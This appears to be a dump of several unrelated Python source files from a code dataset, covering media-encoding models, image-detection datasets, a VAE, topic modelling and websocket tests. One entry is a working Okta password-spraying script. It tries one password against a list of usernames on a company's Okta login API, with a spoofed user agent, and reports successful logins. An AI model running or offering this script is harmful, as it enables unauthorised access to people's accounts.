id
stringlengths 3
8
| content
stringlengths 100
981k
|
|---|---|
1688770
|
from bitmovin.errors import InvalidTypeError
from bitmovin.resources import AbstractNameDescriptionResource
from bitmovin.resources.models import AbstractModel
from bitmovin.utils import Serializable
from .concatenation_input_stream_configuration import ConcatenationInputStreamConfiguration
class ConcatenationInputStream(AbstractNameDescriptionResource, AbstractModel, Serializable):
def __init__(self, concatenation, id_=None, custom_data=None, name=None, description=None):
super().__init__(id_=id_, custom_data=custom_data, name=name, description=description)
self._concatenation = None
if concatenation is not None and not isinstance(concatenation, list):
raise InvalidTypeError('concatenation must be a list')
self.concatenation = concatenation
@property
def concatenation(self):
return self._concatenation
@concatenation.setter
def concatenation(self, new_concatenations):
if new_concatenations is None:
self._concatenation = None
elif not isinstance(new_concatenations, list):
raise InvalidTypeError(
'new_concatenation has to be a list of ConcatenationInputStreamConfiguration objects'
)
if all(isinstance(concatenation, ConcatenationInputStreamConfiguration)
for concatenation in new_concatenations):
self._concatenation = new_concatenations
else:
concatenations = []
for json_object in new_concatenations:
concatenation = ConcatenationInputStreamConfiguration.parse_from_json_object(json_object=json_object)
concatenations.append(concatenation)
self._concatenation = concatenations
@classmethod
def parse_from_json_object(cls, json_object):
id_ = json_object.get('id')
custom_data = json_object.get('customData')
name = json_object.get('name')
description = json_object.get('description')
concatenation = json_object.get('concatenation')
concatenation_input_stream = ConcatenationInputStream(
concatenation=concatenation,
id_=id_,
custom_data=custom_data,
name=name,
description=description
)
return concatenation_input_stream
def serialize(self):
serialized = super().serialize()
serialized['concatenation'] = self.concatenation
return serialized
|
1688790
|
data = (
'jeo', # 0x00
'jeog', # 0x01
'jeogg', # 0x02
'jeogs', # 0x03
'jeon', # 0x04
'jeonj', # 0x05
'jeonh', # 0x06
'jeod', # 0x07
'jeol', # 0x08
'jeolg', # 0x09
'jeolm', # 0x0a
'jeolb', # 0x0b
'jeols', # 0x0c
'jeolt', # 0x0d
'jeolp', # 0x0e
'jeolh', # 0x0f
'jeom', # 0x10
'jeob', # 0x11
'jeobs', # 0x12
'jeos', # 0x13
'jeoss', # 0x14
'jeong', # 0x15
'jeoj', # 0x16
'jeoc', # 0x17
'jeok', # 0x18
'jeot', # 0x19
'jeop', # 0x1a
'jeoh', # 0x1b
'je', # 0x1c
'jeg', # 0x1d
'jegg', # 0x1e
'jegs', # 0x1f
'jen', # 0x20
'jenj', # 0x21
'jenh', # 0x22
'jed', # 0x23
'jel', # 0x24
'jelg', # 0x25
'jelm', # 0x26
'jelb', # 0x27
'jels', # 0x28
'jelt', # 0x29
'jelp', # 0x2a
'jelh', # 0x2b
'jem', # 0x2c
'jeb', # 0x2d
'jebs', # 0x2e
'jes', # 0x2f
'jess', # 0x30
'jeng', # 0x31
'jej', # 0x32
'jec', # 0x33
'jek', # 0x34
'jet', # 0x35
'jep', # 0x36
'jeh', # 0x37
'jyeo', # 0x38
'jyeog', # 0x39
'jyeogg', # 0x3a
'jyeogs', # 0x3b
'jyeon', # 0x3c
'jyeonj', # 0x3d
'jyeonh', # 0x3e
'jyeod', # 0x3f
'jyeol', # 0x40
'jyeolg', # 0x41
'jyeolm', # 0x42
'jyeolb', # 0x43
'jyeols', # 0x44
'jyeolt', # 0x45
'jyeolp', # 0x46
'jyeolh', # 0x47
'jyeom', # 0x48
'jyeob', # 0x49
'jyeobs', # 0x4a
'jyeos', # 0x4b
'jyeoss', # 0x4c
'jyeong', # 0x4d
'jyeoj', # 0x4e
'jyeoc', # 0x4f
'jyeok', # 0x50
'jyeot', # 0x51
'jyeop', # 0x52
'jyeoh', # 0x53
'jye', # 0x54
'jyeg', # 0x55
'jyegg', # 0x56
'jyegs', # 0x57
'jyen', # 0x58
'jyenj', # 0x59
'jyenh', # 0x5a
'jyed', # 0x5b
'jyel', # 0x5c
'jyelg', # 0x5d
'jyelm', # 0x5e
'jyelb', # 0x5f
'jyels', # 0x60
'jyelt', # 0x61
'jyelp', # 0x62
'jyelh', # 0x63
'jyem', # 0x64
'jyeb', # 0x65
'jyebs', # 0x66
'jyes', # 0x67
'jyess', # 0x68
'jyeng', # 0x69
'jyej', # 0x6a
'jyec', # 0x6b
'jyek', # 0x6c
'jyet', # 0x6d
'jyep', # 0x6e
'jyeh', # 0x6f
'jo', # 0x70
'jog', # 0x71
'jogg', # 0x72
'jogs', # 0x73
'jon', # 0x74
'jonj', # 0x75
'jonh', # 0x76
'jod', # 0x77
'jol', # 0x78
'jolg', # 0x79
'jolm', # 0x7a
'jolb', # 0x7b
'jols', # 0x7c
'jolt', # 0x7d
'jolp', # 0x7e
'jolh', # 0x7f
'jom', # 0x80
'job', # 0x81
'jobs', # 0x82
'jos', # 0x83
'joss', # 0x84
'jong', # 0x85
'joj', # 0x86
'joc', # 0x87
'jok', # 0x88
'jot', # 0x89
'jop', # 0x8a
'joh', # 0x8b
'jwa', # 0x8c
'jwag', # 0x8d
'jwagg', # 0x8e
'jwags', # 0x8f
'jwan', # 0x90
'jwanj', # 0x91
'jwanh', # 0x92
'jwad', # 0x93
'jwal', # 0x94
'jwalg', # 0x95
'jwalm', # 0x96
'jwalb', # 0x97
'jwals', # 0x98
'jwalt', # 0x99
'jwalp', # 0x9a
'jwalh', # 0x9b
'jwam', # 0x9c
'jwab', # 0x9d
'jwabs', # 0x9e
'jwas', # 0x9f
'jwass', # 0xa0
'jwang', # 0xa1
'jwaj', # 0xa2
'jwac', # 0xa3
'jwak', # 0xa4
'jwat', # 0xa5
'jwap', # 0xa6
'jwah', # 0xa7
'jwae', # 0xa8
'jwaeg', # 0xa9
'jwaegg', # 0xaa
'jwaegs', # 0xab
'jwaen', # 0xac
'jwaenj', # 0xad
'jwaenh', # 0xae
'jwaed', # 0xaf
'jwael', # 0xb0
'jwaelg', # 0xb1
'jwaelm', # 0xb2
'jwaelb', # 0xb3
'jwaels', # 0xb4
'jwaelt', # 0xb5
'jwaelp', # 0xb6
'jwaelh', # 0xb7
'jwaem', # 0xb8
'jwaeb', # 0xb9
'jwaebs', # 0xba
'jwaes', # 0xbb
'jwaess', # 0xbc
'jwaeng', # 0xbd
'jwaej', # 0xbe
'jwaec', # 0xbf
'jwaek', # 0xc0
'jwaet', # 0xc1
'jwaep', # 0xc2
'jwaeh', # 0xc3
'joe', # 0xc4
'joeg', # 0xc5
'joegg', # 0xc6
'joegs', # 0xc7
'joen', # 0xc8
'joenj', # 0xc9
'joenh', # 0xca
'joed', # 0xcb
'joel', # 0xcc
'joelg', # 0xcd
'joelm', # 0xce
'joelb', # 0xcf
'joels', # 0xd0
'joelt', # 0xd1
'joelp', # 0xd2
'joelh', # 0xd3
'joem', # 0xd4
'joeb', # 0xd5
'joebs', # 0xd6
'joes', # 0xd7
'joess', # 0xd8
'joeng', # 0xd9
'joej', # 0xda
'joec', # 0xdb
'joek', # 0xdc
'joet', # 0xdd
'joep', # 0xde
'joeh', # 0xdf
'jyo', # 0xe0
'jyog', # 0xe1
'jyogg', # 0xe2
'jyogs', # 0xe3
'jyon', # 0xe4
'jyonj', # 0xe5
'jyonh', # 0xe6
'jyod', # 0xe7
'jyol', # 0xe8
'jyolg', # 0xe9
'jyolm', # 0xea
'jyolb', # 0xeb
'jyols', # 0xec
'jyolt', # 0xed
'jyolp', # 0xee
'jyolh', # 0xef
'jyom', # 0xf0
'jyob', # 0xf1
'jyobs', # 0xf2
'jyos', # 0xf3
'jyoss', # 0xf4
'jyong', # 0xf5
'jyoj', # 0xf6
'jyoc', # 0xf7
'jyok', # 0xf8
'jyot', # 0xf9
'jyop', # 0xfa
'jyoh', # 0xfb
'ju', # 0xfc
'jug', # 0xfd
'jugg', # 0xfe
'jugs', # 0xff
)
|
1688798
|
from chainercv.datasets.coco.coco_instances_base_dataset import \
COCOInstancesBaseDataset
class COCOBboxDataset(COCOInstancesBaseDataset):
"""Bounding box dataset for `MS COCO`_.
.. _`MS COCO`: http://cocodataset.org/#home
Args:
data_dir (string): Path to the root of the training data. If this is
:obj:`auto`, this class will automatically download data for you
under :obj:`$CHAINER_DATASET_ROOT/pfnet/chainercv/coco`.
split ({'train', 'val', 'minival', 'valminusminival'}): Select
a split of the dataset.
year ({'2014', '2017'}): Use a dataset released in :obj:`year`.
Splits :obj:`minival` and :obj:`valminusminival` are only
supported in year :obj:`2014`.
use_crowded (bool): If true, use bounding boxes that are labeled as
crowded in the original annotation. The default value is
:obj:`False`.
return_area (bool): If true, this dataset returns areas of masks
around objects. The default value is :obj:`False`.
return_crowded (bool): If true, this dataset returns a boolean array
that indicates whether bounding boxes are labeled as crowded
or not. The default value is :obj:`False`.
This dataset returns the following data.
.. csv-table::
:header: name, shape, dtype, format
:obj:`img`, ":math:`(3, H, W)`", :obj:`float32`, \
"RGB, :math:`[0, 255]`"
:obj:`bbox` [#coco_bbox_1]_, ":math:`(R, 4)`", :obj:`float32`, \
":math:`(y_{min}, x_{min}, y_{max}, x_{max})`"
:obj:`label` [#coco_bbox_1]_, ":math:`(R,)`", :obj:`int32`, \
":math:`[0, \#fg\_class - 1]`"
:obj:`area` [#coco_bbox_1]_ [#coco_bbox_2]_, ":math:`(R,)`", \
:obj:`float32`, --
:obj:`crowded` [#coco_bbox_3]_, ":math:`(R,)`", :obj:`bool`, --
.. [#coco_bbox_1] If :obj:`use_crowded = True`, :obj:`bbox`, \
:obj:`label` and :obj:`area` contain crowded instances.
.. [#coco_bbox_2] :obj:`area` is available \
if :obj:`return_area = True`.
.. [#coco_bbox_3] :obj:`crowded` is available \
if :obj:`return_crowded = True`.
When there are more than ten objects from the same category,
bounding boxes correspond to crowd of instances instead of individual
instances. Please see more detail in the Fig. 12 (e) of the summary
paper [#]_.
.. [#] <NAME>, <NAME>, <NAME>, <NAME>, \
<NAME>, <NAME>, <NAME>, <NAME>, \
<NAME>, <NAME>.
`Microsoft COCO: Common Objects in Context \
<https://arxiv.org/abs/1405.0312>`_. arXiv 2014.
"""
def __init__(self, data_dir='auto', split='train', year='2017',
use_crowded=False, return_area=False, return_crowded=False):
super(COCOBboxDataset, self).__init__(
data_dir, split, year, use_crowded)
keys = ('img', 'bbox', 'label')
if return_area:
keys += ('area',)
if return_crowded:
keys += ('crowded',)
self.keys = keys
|
1688838
|
import os
import numpy as np
import copy
from PIL import Image, ImageDraw
from collections.abc import Sequence
from paddle.io import Dataset
from data.operators import *
from eval_model import get_categories, get_infer_results
class ImageFolder(Dataset):
def __init__(self,
dataset_dir=None,
image_dir=None,
anno_path=None,
data_fields=['image'],
sample_num=-1,
use_default_label=None,
**kwargs):
super(ImageFolder, self).__init__()
self.dataset_dir = dataset_dir if dataset_dir is not None else ''
self.anno_path = anno_path
self.image_dir = image_dir if image_dir is not None else ''
self.data_fields = data_fields
self.sample_num = sample_num
self.use_default_label = use_default_label
self._epoch = 0
self._curr_iter = 0
self._imid2path = {}
self.roidbs = None
self.sample_num = sample_num
def __len__(self, ):
return len(self.roidbs)
def __getitem__(self, idx):
# data batch
roidb = copy.deepcopy(self.roidbs[idx])
if self.mixup_epoch == 0 or self._epoch < self.mixup_epoch:
n = len(self.roidbs)
idx = np.random.randint(n)
roidb = [roidb, copy.deepcopy(self.roidbs[idx])]
elif self.cutmix_epoch == 0 or self._epoch < self.cutmix_epoch:
n = len(self.roidbs)
idx = np.random.randint(n)
roidb = [roidb, copy.deepcopy(self.roidbs[idx])]
elif self.mosaic_epoch == 0 or self._epoch < self.mosaic_epoch:
n = len(self.roidbs)
roidb = [roidb, ] + [
copy.deepcopy(self.roidbs[np.random.randint(n)])
for _ in range(3)
]
if isinstance(roidb, Sequence):
for r in roidb:
r['curr_iter'] = self._curr_iter
else:
roidb['curr_iter'] = self._curr_iter
self._curr_iter += 1
return self.transform(roidb)
def check_or_download_dataset(self):
return
def set_kwargs(self, **kwargs):
self.mixup_epoch = kwargs.get('mixup_epoch', -1)
self.cutmix_epoch = kwargs.get('cutmix_epoch', -1)
self.mosaic_epoch = kwargs.get('mosaic_epoch', -1)
def set_transform(self, transform):
self.transform = transform
def set_epoch(self, epoch_id):
self._epoch = epoch_id
def parse_dataset(self, ):
if not self.roidbs:
self.roidbs = self._load_images()
def get_anno(self):
if self.anno_path is None:
return
return os.path.join(self.dataset_dir, self.anno_path)
def _parse(self):
image_dir = self.image_dir
if not isinstance(image_dir, Sequence):
image_dir = [image_dir]
images = []
for im_dir in image_dir:
if os.path.isdir(im_dir):
im_dir = os.path.join(self.dataset_dir, im_dir)
images.extend(_make_dataset(im_dir))
elif os.path.isfile(im_dir) and _is_valid_file(im_dir):
images.append(im_dir)
return images
def _load_images(self):
images = self._parse()
ct = 0
records = []
for image in images:
assert image != '' and os.path.isfile(image), \
"Image {} not found".format(image)
if self.sample_num > 0 and ct >= self.sample_num:
break
rec = {'im_id': np.array([ct]), 'im_file': image}
self._imid2path[ct] = image
ct += 1
records.append(rec)
assert len(records) > 0, "No image file found"
return records
def get_imid2path(self):
return self._imid2path
def set_images(self, images):
self.image_dir = images
self.roidbs = self._load_images()
def _is_valid_file(f, extensions=('.jpg', '.jpeg', '.png', '.bmp')):
return f.lower().endswith(extensions)
def _make_dataset(dir):
dir = os.path.expanduser(dir)
if not os.path.isdir(dir):
raise ('{} should be a dir'.format(dir))
images = []
for root, _, fnames in sorted(os.walk(dir, followlinks=True)):
for fname in sorted(fnames):
path = os.path.join(root, fname)
if _is_valid_file(path):
images.append(path)
return images
def draw_bbox(image, bbox_res, im_id, catid2name, threshold=0.5):
"""
Draw bbox on image
"""
draw = ImageDraw.Draw(image)
catid2color = {}
color_list = colormap(rgb=True)[:40]
for dt in np.array(bbox_res):
if im_id != dt['image_id']:
continue
catid, bbox, score = dt['category_id'], dt['bbox'], dt['score']
if score < threshold:
continue
if catid not in catid2color:
idx = np.random.randint(len(color_list))
catid2color[catid] = color_list[idx]
color = tuple(catid2color[catid])
# draw bbox
xmin, ymin, w, h = bbox
xmax = xmin + w
ymax = ymin + h
draw.line(
[(xmin, ymin), (xmin, ymax), (xmax, ymax), (xmax, ymin),
(xmin, ymin)],
width=2,
fill=color)
# draw label
text = "{} {:.2f}".format(catid2name[catid], score)
tw, th = draw.textsize(text)
draw.rectangle(
[(xmin + 1, ymin - th), (xmin + tw + 1, ymin)], fill=color)
draw.text((xmin + 1, ymin - th), text, fill=(255, 255, 255))
return image
def colormap(rgb=False):
"""
Get colormap
"""
color_list = np.array([
0.000, 0.447, 0.741, 0.850, 0.325, 0.098, 0.929, 0.694, 0.125, 0.494,
0.184, 0.556, 0.466, 0.674, 0.188, 0.301, 0.745, 0.933, 0.635, 0.078,
0.184, 0.300, 0.300, 0.300, 0.600, 0.600, 0.600, 1.000, 0.000, 0.000,
1.000, 0.500, 0.000, 0.749, 0.749, 0.000, 0.000, 1.000, 0.000, 0.000,
0.000, 1.000, 0.667, 0.000, 1.000, 0.333, 0.333, 0.000, 0.333, 0.667,
0.000, 0.333, 1.000, 0.000, 0.667, 0.333, 0.000, 0.667, 0.667, 0.000,
0.667, 1.000, 0.000, 1.000, 0.333, 0.000, 1.000, 0.667, 0.000, 1.000,
1.000, 0.000, 0.000, 0.333, 0.500, 0.000, 0.667, 0.500, 0.000, 1.000,
0.500, 0.333, 0.000, 0.500, 0.333, 0.333, 0.500, 0.333, 0.667, 0.500,
0.333, 1.000, 0.500, 0.667, 0.000, 0.500, 0.667, 0.333, 0.500, 0.667,
0.667, 0.500, 0.667, 1.000, 0.500, 1.000, 0.000, 0.500, 1.000, 0.333,
0.500, 1.000, 0.667, 0.500, 1.000, 1.000, 0.500, 0.000, 0.333, 1.000,
0.000, 0.667, 1.000, 0.000, 1.000, 1.000, 0.333, 0.000, 1.000, 0.333,
0.333, 1.000, 0.333, 0.667, 1.000, 0.333, 1.000, 1.000, 0.667, 0.000,
1.000, 0.667, 0.333, 1.000, 0.667, 0.667, 1.000, 0.667, 1.000, 1.000,
1.000, 0.000, 1.000, 1.000, 0.333, 1.000, 1.000, 0.667, 1.000, 0.167,
0.000, 0.000, 0.333, 0.000, 0.000, 0.500, 0.000, 0.000, 0.667, 0.000,
0.000, 0.833, 0.000, 0.000, 1.000, 0.000, 0.000, 0.000, 0.167, 0.000,
0.000, 0.333, 0.000, 0.000, 0.500, 0.000, 0.000, 0.667, 0.000, 0.000,
0.833, 0.000, 0.000, 1.000, 0.000, 0.000, 0.000, 0.167, 0.000, 0.000,
0.333, 0.000, 0.000, 0.500, 0.000, 0.000, 0.667, 0.000, 0.000, 0.833,
0.000, 0.000, 1.000, 0.000, 0.000, 0.000, 0.143, 0.143, 0.143, 0.286,
0.286, 0.286, 0.429, 0.429, 0.429, 0.571, 0.571, 0.571, 0.714, 0.714,
0.714, 0.857, 0.857, 0.857, 1.000, 1.000, 1.000
]).astype(np.float32)
color_list = color_list.reshape((-1, 3)) * 255
if not rgb:
color_list = color_list[:, ::-1]
return color_list
def predict(images,
model,
draw_threshold=0.5,
output_dir='output',
anno_path=None):
status = {}
dataset = ImageFolder(anno_path=anno_path)
dataset.set_images(images)
sample_transforms = [{Decode: {}}, {Resize: {'target_size': [800, 1333], 'keep_ratio': True}}, {NormalizeImage: {'is_scale': True, 'mean': [0.485, 0.456, 0.406], 'std': [0.229, 0.224, 0.225]}}, {Permute: {}}]
batch_transforms = [{PadMaskBatch: {'pad_to_stride': -1, 'return_pad_mask': True}}]
loader = BaseDataLoader(sample_transforms, batch_transforms, batch_size=1, shuffle=False, drop_last=False)(dataset, 0)
imid2path = dataset.get_imid2path()
anno_file = dataset.get_anno()
clsid2catid, catid2name = get_categories('COCO', anno_file=anno_file)
# Run Infer
status['mode'] = 'test'
model.eval()
for step_id, data in enumerate(loader):
status['step_id'] = step_id
# forward
outs = model(data)
for key in ['im_shape', 'scale_factor', 'im_id']:
outs[key] = data[key]
for key, value in outs.items():
if hasattr(value, 'numpy'):
outs[key] = value.numpy()
batch_res = get_infer_results(outs, clsid2catid)
bbox_num = outs['bbox_num']
start = 0
for i, im_id in enumerate(outs['im_id']):
image_path = imid2path[int(im_id)]
image = Image.open(image_path).convert('RGB')
status['original_image'] = np.array(image.copy())
end = start + bbox_num[i]
bbox_res = batch_res['bbox'][start:end] if 'bbox' in batch_res else None
if bbox_res is not None:
image = draw_bbox(image, bbox_res,int(im_id), catid2name, draw_threshold)
status['result_image'] = np.array(image.copy())
# save image with detection
if not os.path.exists(output_dir):
os.makedirs(output_dir)
image_name = os.path.split(image_path)[-1]
name, ext = os.path.splitext(image_name)
save_name = os.path.join(output_dir, "{}".format(name)) + ext
print("Detection bbox results save in {}".format(save_name))
image.save(save_name, quality=95)
start = end
def get_test_images(infer_img,infer_dir=None):
"""
Get image path list in TEST mode
"""
assert infer_img is not None or infer_dir is not None, \
"--infer_img or --infer_dir should be set"
assert infer_img is None or os.path.isfile(infer_img), \
"{} is not a file".format(infer_img)
assert infer_dir is None or os.path.isdir(infer_dir), \
"{} is not a directory".format(infer_dir)
# infer_img has a higher priority
if infer_img and os.path.isfile(infer_img):
return [infer_img]
images = set()
infer_dir = os.path.abspath(infer_dir)
assert os.path.isdir(infer_dir), \
"infer_dir {} is not a directory".format(infer_dir)
exts = ['jpg', 'jpeg', 'png', 'bmp']
exts += [ext.upper() for ext in exts]
for ext in exts:
images.update(glob.glob('{}/*.{}'.format(infer_dir, ext)))
images = list(images)
assert len(images) > 0, "no image found in {}".format(infer_dir)
print("Found {} inference images in total.".format(len(images)))
return images
|
1688874
|
import requests
from requests.auth import HTTPBasicAuth
from optparse import OptionParser
import sys
import time
if ((len(sys.argv) < 9 or len(sys.argv) > 9) and '-h' not in sys.argv):
print("Usage:")
print("python3 %s -p <password> -f <inputfile> -d <domain> -w <wait_time>" % sys.argv[0])
sys.exit(1)
parser = OptionParser()
parser.add_option("-p", "--password", help="Password to spray with")
parser.add_option("-f", "--inputfile", help="File with usernames")
parser.add_option("-d", "--domain", help="Company domain")
parser.add_option("-w", "--wait", help="Seconds to wait between each spray attempt")
(options, args) = parser.parse_args()
domain = options.domain.partition('.')
domain2 = domain[0]
sleeptime = int(options.wait)
oktadomain = '%s.okta.com' % domain2
url = 'https://%s/api/v1/authn' % oktadomain
headers = {'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36'}
print("+"*100)
print("Okta Password Sprayer")
print("+"*100)
password = <PASSWORD>.password.strip()
print("Spraying...with a wait time of %s..." % options.wait)
with open ("%s" % options.inputfile, "r") as oktausers:
for line in oktausers:
try:
usr = line.strip()
data = {"username":"{}".format(usr),"options":{"warnBeforePasswordExpired":"true","multiOptionalFactorEnroll":"true"},"password":"{}".<PASSWORD>(password)}
print("--Waiting %s seconds..." % options.wait)
time.sleep(sleeptime)
response = requests.post(url, headers=headers, json=data)
if response.status_code == 200:
print("\033[92mlogin successful - %s:%s\033[0m" % (usr, password))
print("\033[1mOkta Response Info:\033[0m")
print(response.text)
response.close()
else:
print("\033[91mAuthentication failed - %s:%s\033[0m" % (usr, password))
except Exception as e:
print(e)
|
1688892
|
import torch
from torch.nn import functional as F
from torch.autograd import Variable
import torch.nn as nn
import math
import numpy as np
from ..config import eps
class ConvBlock4(torch.nn.Module):
def __init__(self, inpt_kernel, output_kernel, kernel_size=4, stride=1, padding=0):
super().__init__()
self.conv = nn.Conv2d(in_channels=inpt_kernel, out_channels=output_kernel, kernel_size=kernel_size, stride=stride, padding=padding)
self.bn = nn.BatchNorm2d(output_kernel)
self.act = nn.LeakyReLU(inplace=True)
# self.drp = nn.Dropout2d(0.3)
gain = nn.init.calculate_gain('leaky_relu')
nn.init.xavier_uniform_(self.conv.weight, gain=gain)
def forward(self, x):
x = self.conv(x)
x = self.bn(x)
# x = self.drp(x)
x = self.act(x)
return x
class DeconvBlock4(torch.nn.Module):
def __init__(self, inpt_kernel, output_kernel, kernel_size=4, stride=1, padding=0):
super().__init__()
self.deconv = nn.ConvTranspose2d(in_channels=inpt_kernel, out_channels=output_kernel, kernel_size=kernel_size, stride=stride, padding=padding)
self.bn = nn.BatchNorm2d(output_kernel)
self.act = nn.LeakyReLU(inplace=True)
# self.drp = nn.Dropout2d(0.3)
gain = nn.init.calculate_gain('leaky_relu')
nn.init.xavier_uniform_(self.deconv.weight, gain=gain)
def forward(self, x):
x = self.deconv(x)
x = self.bn(x)
# x = self.drp(x)
x = self.act(x)
return x
class VAE5(nn.Module):
"""
VAE. Vector Quantised Variational Auto-Encoder.
Refs:
- https://github.com/nakosung/VQ-VAE/blob/master/model.py
- https://github.com/JunhongXu/world-models-pytorch/blob/master/vae.py
"""
def __init__(self, image_size=64, z_dim=32, conv_dim=64, code_dim=16, k_dim=256, channels=3):
"""
Args:
- image_size (int) height and weight of image
- conv_dim (int) the amound of output channels in the first conv layer (all others are multiples)
- z_dim (int) the channels in the encoded output
- code_dim (int) the height and width in the encoded output
- k_dim (int) dimensions of the latent vector
"""
super().__init__()
self.k_dim = k_dim
self.z_dim = z_dim
self.code_dim = code_dim
hidden_size = z_dim * code_dim * code_dim
latent_vector_dim = k_dim
self.logvar = nn.Linear(hidden_size, latent_vector_dim)
self.mu = nn.Linear(hidden_size, latent_vector_dim)
self.z = nn.Linear(latent_vector_dim, hidden_size)
nn.init.xavier_uniform_(self.logvar.weight)
nn.init.xavier_uniform_(self.mu.weight)
nn.init.xavier_uniform_(self.z.weight)
# Encoder (increasing #filter linearly)
layers = []
layers.append(ConvBlock4(channels, conv_dim, kernel_size=3, padding=1))
repeat_num = int(math.log2(image_size / code_dim))
curr_dim = conv_dim
for i in range(repeat_num):
layers.append(ConvBlock4(curr_dim, conv_dim * (i + 2), kernel_size=4, stride=2, padding=1))
curr_dim = conv_dim * (i + 2)
# Now we have (code_dim,code_dim,curr_dim)
layers.append(nn.Conv2d(curr_dim, z_dim, kernel_size=1))
# (code_dim,code_dim,z_dim)
self.encoder = nn.Sequential(*layers)
# Decoder (320 - 256 - 192 - 128 - 64)
layers = []
layers.append(DeconvBlock4(z_dim, curr_dim, kernel_size=1))
for i in reversed(range(repeat_num)):
layers.append(DeconvBlock4(curr_dim, conv_dim * (i + 1), kernel_size=4, stride=2, padding=1))
curr_dim = conv_dim * (i + 1)
layers.append(nn.Conv2d(curr_dim, channels, kernel_size=3, padding=1))
self.decoder = nn.Sequential(*layers)
self.sigmoid = nn.Sigmoid()
def forward(self, x):
"""Returns reconstructed image, mean, and log variance."""
mu, logvar = self.encode(x)
z = self.sample(mu, logvar)
x = self.decode(z)
return x, mu, logvar
def encode(self, x):
"""Returns mean and log variance, which describe the distributions of Z"""
x = self.encoder(x)
x = x.view(x.size()[0], -1)
return self.mu(x), self.logvar(x).clamp(np.log(eps), -np.log(eps))
def decode(self, z):
"""Reconstruct image X using z sampled from Z."""
z = self.z(z)
n, d = z.size()
z = z.view(n, -1, self.code_dim, self.code_dim)
reconstruction = self.decoder(z)
reconstruction = self.sigmoid(reconstruction)
return reconstruction
def sample(self, mu, logvar):
"""Sample z from Z."""
if self.training:
std = logvar.exp()
std = std * Variable(std.data.new(std.size()).normal_())
return mu + std
else:
return mu
def loss(self, *args, **kwargs):
return loss_function_vae(*args, **kwargs)
def loss_function_vae(recon_x, x, mu, logvar):
# Reconstruction + KL divergence losses summed over all elements and batch
# https://github.com/pytorch/examples/blob/master/vae/main.py
n, c, h, w = recon_x.size()
recon_x = recon_x.view(n, -1)
x = x.view(n, -1)
# L2 distance
loss_recon = F.mse_loss(x, recon_x, reduce=False).sum(1)
# see Appendix B from VAE paper:
# <NAME>. Auto-Encoding Variational Bayes. ICLR, 2014
# https://arxiv.org/abs/1312.6114
# 0.5 * sum(1 + log(sigma^2) - mu^2 - sigma^2)
loss_KLD = -0.5 * torch.sum(1 + logvar - mu.pow(2) - logvar.exp(), 1)
return loss_recon, loss_KLD
|
1688893
|
import csv
import ipdb
import logging
from operator import itemgetter
from gensim import corpora, models
from gensim.utils import lemmatize
from gensim.parsing.preprocessing import STOPWORDS
from gensim.models.coherencemodel import CoherenceModel
import gensim
logging.basicConfig(format='%(asctime)s : %(levelname)s : %(message)s', level=logging.INFO)
# create sample documents
print("Reading input file 'input/audits_with_content.csv'")
with open('input/audits_with_content.csv', 'r') as f:
reader = csv.reader(f)
documents = list(reader)
print("Remove documents without body")
all_docs = [doc for doc in documents if len(doc) == 4 and doc[2] != '']
documents = [doc[2] for doc in documents if len(doc) == 4 and doc[2] != '']
doc_count = len(documents)
# list for tokenized documents in loop
texts = []
print("Generating lemmas for each of the documents")
for document in documents:
# clean and lemmatize document string
raw = document.lower()
tokens = lemmatize(raw, stopwords=STOPWORDS)
texts.append(tokens)
print("Turn our tokenized documents into a id <-> term dictionary")
dictionary = corpora.Dictionary(texts)
print("Convert tokenized documents into a document-term matrix")
corpus = [dictionary.doc2bow(text) for text in texts]
print("Generate LDA model")
ldamodel = gensim.models.ldamodel.LdaModel(corpus, num_topics=10, id2word=dictionary, passes=50)
print("Writting topics to file")
topics_file = open('output/gensim_topics.txt', 'w')
topics_list = ldamodel.print_topics(num_topics=10, num_words=5)
topics_string = ['Topic {}: {}'.format(i, topic) for i, topic in topics_list]
topics_file.write("\n".join(topics_string))
topics_file.close()
print("Writing tagged docs to file")
tagged_documents_file = open('output/tagged_data.txt', 'w')
for index, document in enumerate(documents):
raw = document.lower()
doc_tokens = lemmatize(raw, stopwords=STOPWORDS)
doc_bow = dictionary.doc2bow(doc_tokens)
result = ldamodel[doc_bow]
tag = max(result, key=itemgetter(1))[0]
tag_string = 'Document {} on {}: Tagged with topic {}\n'.format(index+1, all_docs[index][0], str(tag))
tagged_documents_file.write(tag_string)
tagged_documents_file.close()
|
1688917
|
from loguetools import xd
def test_translate_step_data():
data = "00 01 02 03 04 05 06 07 08 09 0a 0b 0c 0d 0e 0f 10 20 30 40".replace(' ', '')
og_step_data = bytes.fromhex(data)
output = xd.fn_translate_step_data(og_step_data)
match = bytes.fromhex(
'00 01 02 03 00 00 00 00 04 05 06 07 00 00 00 00 08 09 0a 0b 00 00 00 00 0c 0d 00 00 ' + \
'00 00 00 0e 0f 00 00 00 00 00 10 20 00 00 00 00 00 30 40 00 00 00 00 00'.replace(' ', '')
)
assert output == match
|
1688920
|
import os
def pre_process(data_path):
file_name = os.path.split(data_path)[1].split('.')[0]
return data_path, file_name
|
1688934
|
import json
import asyncio
import pytest
from model_mommy import mommy
from aiohttp import ws_connect, WSServerHandshakeError
from aiohttp.web import Application, MsgType
from rest_framework.authtoken.models import Token
from redis_pubsub.contrib.websockets import websocket, websocket_pubsub
from redis_pubsub.contrib.websockets.util import _clean_route
from testapp.models import Message
@pytest.mark.parametrize("route, expect", [
("/hello", "/hello/"),
("hello", "/hello/"),
("hello/world", "/hello/world/"),
("/hello/world/", "/hello/world/"),
])
def test_clean_route(route, expect):
route = _clean_route(route)
assert route == expect
def test_websocket_wrapper():
loop = asyncio.get_event_loop()
@websocket("/")
def handler(ws, params, **kwargs):
ws.send_str("hello, world!")
@asyncio.coroutine
def start_server(loop):
app = Application()
app.router.add_route(*handler.route)
srv = yield from loop.create_server(app.make_handler(), "localhost", 9000)
return srv
@asyncio.coroutine
def go(loop):
srv = yield from start_server(loop)
client = yield from ws_connect("http://localhost:9000")
message = yield from client.receive()
assert message.data == "hello, world!"
yield from client.close()
srv.close()
yield from srv.wait_closed()
loop.run_until_complete(go(loop))
@pytest.mark.django_db
def test_websocket_pubsub_wrapper(subscription):
loop = asyncio.get_event_loop()
@websocket_pubsub("/")
def handler(ws, params, **kwargs):
reader = subscription.get_reader(kwargs["manager"])
@reader.callback
def send_message(channel_name, model):
ws.send_str(model.name)
return False
listener = yield from reader.listen()
yield from asyncio.gather(listener)
@asyncio.coroutine
def pub():
yield from asyncio.sleep(1) # wait a second for the listener to start
